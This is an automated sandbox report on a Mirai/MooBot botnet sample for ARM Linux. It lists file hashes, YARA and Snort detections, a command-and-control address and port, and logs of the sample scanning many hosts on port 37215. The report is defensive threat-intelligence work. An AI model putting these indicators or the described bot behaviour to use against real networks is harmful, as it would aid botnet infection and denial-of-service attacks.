Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
huhu.arm.elf

Overview

General Information

Sample name:huhu.arm.elf
Analysis ID:1382469
MD5:bd0288bb7c4b34902c98b5b700ccdca1
SHA1:5c98873909c1ce2dfddd59ced5b1ce1f4c26e403
SHA256:f8001abcfa86a36ccf6e7d971183513f9226c8b5e19ed35d72242df08b337a91
Infos:

Detection

Mirai
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Detected Mirai
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Mirai
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Found strings indicative of a multi-platform dropper
HTTP GET or POST without a user agent
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

Analysis Advice

Some HTTP requests failed (404). It is likely that the sample will exhibit less behavior.
Static ELF header machine description suggests that the sample might not execute correctly on this machine.
Static ELF header machine description suggests that the sample might only run correctly on MIPS or ARM architectures.
Joe Sandbox version:39.0.0 Ruby
Analysis ID:1382469
Start date and time:2024-01-29 07:02:10 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 30s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:huhu.arm.elf
Detection:MAL
Classification:mal100.troj.linELF@0/1025@23/0
  • Report size exceeded maximum capacity and may have missing network information.
Command:/tmp/huhu.arm.elf
PID:5487
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
done.
Standard Error:
  • system is lnxubuntu20
  • sh (PID: 5502, Parent: 1383, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-print-notifications
  • gsd-print-notifications (PID: 5502, Parent: 1383, MD5: 71539698aa691718cee775d6b9450ae2) Arguments: /usr/libexec/gsd-print-notifications
  • gdm3 New Fork (PID: 5508, Parent: 1289)
  • Default (PID: 5508, Parent: 1289, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 5526, Parent: 1289)
  • Default (PID: 5526, Parent: 1289, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • systemd New Fork (PID: 5538, Parent: 1)
  • systemd-user-runtime-dir (PID: 5538, Parent: 1, MD5: d55f4b0847f88131dbcfb07435178e54) Arguments: /lib/systemd/systemd-user-runtime-dir stop 127
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
huhu.arm.elfJoeSecurity_Mirai_3Yara detected MiraiJoe Security
    huhu.arm.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      huhu.arm.elfLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
      • 0x1c37c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c390:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c3a4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c3b8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c3cc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c3e0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c3f4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c408:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c41c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c430:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c444:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c458:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c46c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c480:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c494:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c4a8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c4bc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c4d0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c4e4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c4f8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c50c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      SourceRuleDescriptionAuthorStrings
      5487.1.00007f22fc017000.00007f22fc037000.r-x.sdmpJoeSecurity_Mirai_3Yara detected MiraiJoe Security
        5487.1.00007f22fc017000.00007f22fc037000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          5487.1.00007f22fc017000.00007f22fc037000.r-x.sdmpLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
          • 0x1c37c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1c390:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1c3a4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1c3b8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1c3cc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1c3e0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1c3f4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1c408:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1c41c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1c430:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1c444:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1c458:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1c46c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1c480:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1c494:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1c4a8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1c4bc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1c4d0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1c4e4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1c4f8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1c50c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          Process Memory Space: huhu.arm.elf PID: 5487JoeSecurity_Mirai_3Yara detected MiraiJoe Security
            Process Memory Space: huhu.arm.elf PID: 5487Linux_Trojan_Gafgyt_28a2fe0cunknownunknown
            • 0x3db5:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x3dc9:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x3ddd:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x3df1:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x3e05:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x3e19:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x3e2d:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x3e41:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x3e55:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x3e69:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x3e7d:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x3e91:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x3ea5:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x3eb9:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x3ecd:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x3ee1:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x3ef5:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x3f09:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x3f1d:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x3f31:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x3f45:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            Timestamp:192.168.2.1445.142.182.12349312199902030490 01/29/24-07:03:50.131879
            SID:2030490
            Source Port:49312
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.1445.142.182.12334512199902030490 01/29/24-07:03:03.280778
            SID:2030490
            Source Port:34512
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.1445.142.182.12334620199902030490 01/29/24-07:03:08.032429
            SID:2030490
            Source Port:34620
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.1445.142.182.12335098199902030490 01/29/24-07:03:28.594998
            SID:2030490
            Source Port:35098
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.1445.142.182.12334746199902030490 01/29/24-07:03:12.545080
            SID:2030490
            Source Port:34746
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.1445.142.182.12334934199902030490 01/29/24-07:03:22.580994
            SID:2030490
            Source Port:34934
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.1445.142.182.12333456199902030490 01/29/24-07:02:58.767754
            SID:2030490
            Source Port:33456
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.1445.142.182.12334892199902030490 01/29/24-07:03:20.063160
            SID:2030490
            Source Port:34892
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.1445.142.182.12335068199902030490 01/29/24-07:03:27.089146
            SID:2030490
            Source Port:35068
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.1445.142.182.12339402199902030490 01/29/24-07:03:39.104066
            SID:2030490
            Source Port:39402
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.1445.142.182.12348356199902030490 01/29/24-07:03:48.617573
            SID:2030490
            Source Port:48356
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: huhu.arm.elfAvira: detected
            Source: huhu.arm.elfReversingLabs: Detection: 55%
            Source: huhu.arm.elfString: /proc/proc/%d/cmdlinerwgetcurlbusyboxechocatnano,S

            Networking

            barindex
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:33456 -> 45.142.182.123:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:34512 -> 45.142.182.123:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:34620 -> 45.142.182.123:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:34746 -> 45.142.182.123:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:34892 -> 45.142.182.123:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:34934 -> 45.142.182.123:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:35068 -> 45.142.182.123:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:35098 -> 45.142.182.123:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:39402 -> 45.142.182.123:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:48356 -> 45.142.182.123:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:49312 -> 45.142.182.123:19990
            Source: unknownNetwork traffic detected: HTTP traffic on port 52282 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 43282 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 43282
            Source: unknownNetwork traffic detected: HTTP traffic on port 49450 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 49450 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 49450 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 49450 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 49450 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37062 -> 37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 41.54.172.223:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.237.149.109:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.62.172.240:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 148.221.91.97:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 41.15.96.44:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.61.31.175:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.223.247.42:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.133.55.110:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.250.24.172:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.28.148.106:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 24.144.65.134:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 81.148.203.66:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.161.209.45:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.173.72.82:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.168.2.9:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 122.72.139.24:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.147.173.93:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.131.43.241:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.34.135.69:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.55.143.252:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 41.13.180.100:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.29.1.83:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.134.241.23:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.78.252.82:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 179.80.150.182:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 41.142.150.229:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 51.189.134.38:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.1.72.14:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.84.123.244:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 207.100.118.87:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.41.164.42:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.167.224.52:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.14.244.26:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.155.132.253:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 213.153.217.203:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 41.171.180.244:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 106.101.162.52:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.18.1.42:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.143.57.60:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.127.74.71:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.7.195.85:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 185.224.60.3:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.7.168.146:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.244.178.209:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 57.98.1.95:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.27.131.159:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 41.1.248.1:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.113.212.227:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 41.218.240.151:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 41.6.158.255:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.44.79.7:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.99.203.7:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 41.41.50.246:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 152.164.199.171:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 41.100.119.236:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 41.32.200.62:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 196.130.92.165:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.242.255.182:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 194.187.219.121:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.165.100.53:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 41.7.253.251:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 147.79.184.91:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.168.203.108:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.166.151.116:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.220.54.98:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.51.200.194:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 39.55.192.108:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.128.221.179:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.3.143.117:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.121.153.150:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.199.79.210:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 139.207.9.243:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 41.193.202.69:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 109.122.9.138:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.164.75.65:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.136.153.125:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 41.16.145.80:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 69.20.172.81:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.1.174.128:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.56.67.213:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 41.149.135.72:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 126.121.251.53:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 41.132.192.65:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 40.72.241.217:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.6.213.186:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.177.193.239:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.132.78.2:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.117.117.166:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 41.78.24.101:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.161.134.239:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.110.34.132:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 175.91.65.93:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.180.183.121:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.25.132.180:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 41.119.204.168:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 221.255.242.13:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 41.100.218.201:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 62.191.10.165:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 212.3.114.121:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.173.104.144:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.214.235.27:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 41.213.215.66:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 155.89.189.194:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.175.39.61:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.245.86.105:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.150.5.207:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.174.13.1:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.79.237.60:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.111.166.202:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.109.117.103:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.145.89.112:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 187.230.46.113:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 212.28.48.76:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.61.213.159:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 41.233.143.188:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.228.23.226:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 177.197.110.67:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.189.35.156:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.105.105.154:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.127.2.146:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.59.85.8:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.106.234.74:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.149.241.18:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.116.2.113:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 41.242.33.165:37215
